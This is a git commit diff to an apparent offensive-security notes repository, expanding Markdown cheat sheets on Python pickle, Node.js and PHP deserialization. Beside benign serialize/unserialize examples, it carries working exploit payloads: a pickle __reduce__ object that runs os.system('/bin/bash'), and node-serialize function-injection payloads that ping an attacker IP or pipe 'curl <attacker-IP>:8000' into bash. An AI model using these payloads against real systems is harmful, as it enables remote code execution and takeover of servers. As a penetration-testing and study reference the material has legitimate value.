details on pickle and php serialize

2024-05-07 21:38:46 +02:00 · 2024-05-07 21:38:46 +02:00 · 6734e25c2d
parent 815f0cdae6
commit 6734e25c2d
3 changed files with 52 additions and 5 deletions
--- a/Exploits/Python/Pickle.md
+++ b/Exploits/Python/Pickle.md
@ -1,7 +1,25 @@
 # Pickle

+Serializes a Python object into a byte stream an back.
+When sending pickled data through a network do base64 encoding first to prevent
+special characters to do something unexpected.
+
+```python
+import pickle
+import base64
+
+
+text = "Hello, World!"
+pickled = pickle.dumps(text)
+send_data = base64.b64encode(pickled)
+receive_data = base64.b64decode(send_data)
+unpickled = pickle.loads(pickled)
+```
+
 ## Payload
-* Inject payload  
+
+The following payload can be injected into a pickled object.
+
 ```python
 import pickle
 import os
@ -10,12 +28,12 @@ class evil_object(object):
    def __reduce__(self):
        return(os.system, ('/bin/bash',))
 x = evil_object()
-x = evil_object()
 y = pickle.dumps(x)
 base64.b64encode(y)
 ```

 * Dump serialized object via
+
 ```python
 pickle.dump(SerializedPickle(), open('pickled.out', 'wb')
 ```
--- a/Exploits/Web/Node.js
+++ b/Exploits/Web/Node.js
@ -5,10 +5,13 @@
 ## Example Payloads

 * Encode, send and wait with `sudo tcpdump -i <interface> icmp`
+
 ```js
 {"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 <attacker-IP>', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
 ```
-* reverse shell via 
+
+Reverse shell via 
+
 ```js
 {"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl <attacker-IP>:8000 | bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
 ```
--- a/Exploits/Web/PHP
+++ b/Exploits/Web/PHP
@ -1,8 +1,34 @@
-# Unserialize
+# PHP (De-)Serialization
+
+A basic example of (de-)serialization is the following
+
+Serialize is show in the following snippet.
+
+```php
+<?php
+$plain_text = array("title" => "Hello, World!", "content" => "Lore Ipsum Dolor");
+$serialized = serialize($plain_text);
+file_put_contents('serialized.txt', $serialized);
+?>
+```
+
+Deserialize is done in the following snippet.
+
+```php
+<?php
+$serialized = file_get_contents('serialized.txt');
+$plain_text = unserialize($serialized);
+echo "Title: " . $plain_text['title'];
+echo "Content: " . $plain_text['content'];
+?>
+```
+
+## Unserialize

 * [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize)

-* Serialize via
+Serialize a form on a website through PHP via
+
 ```php
 <?php
 class FormSubmit {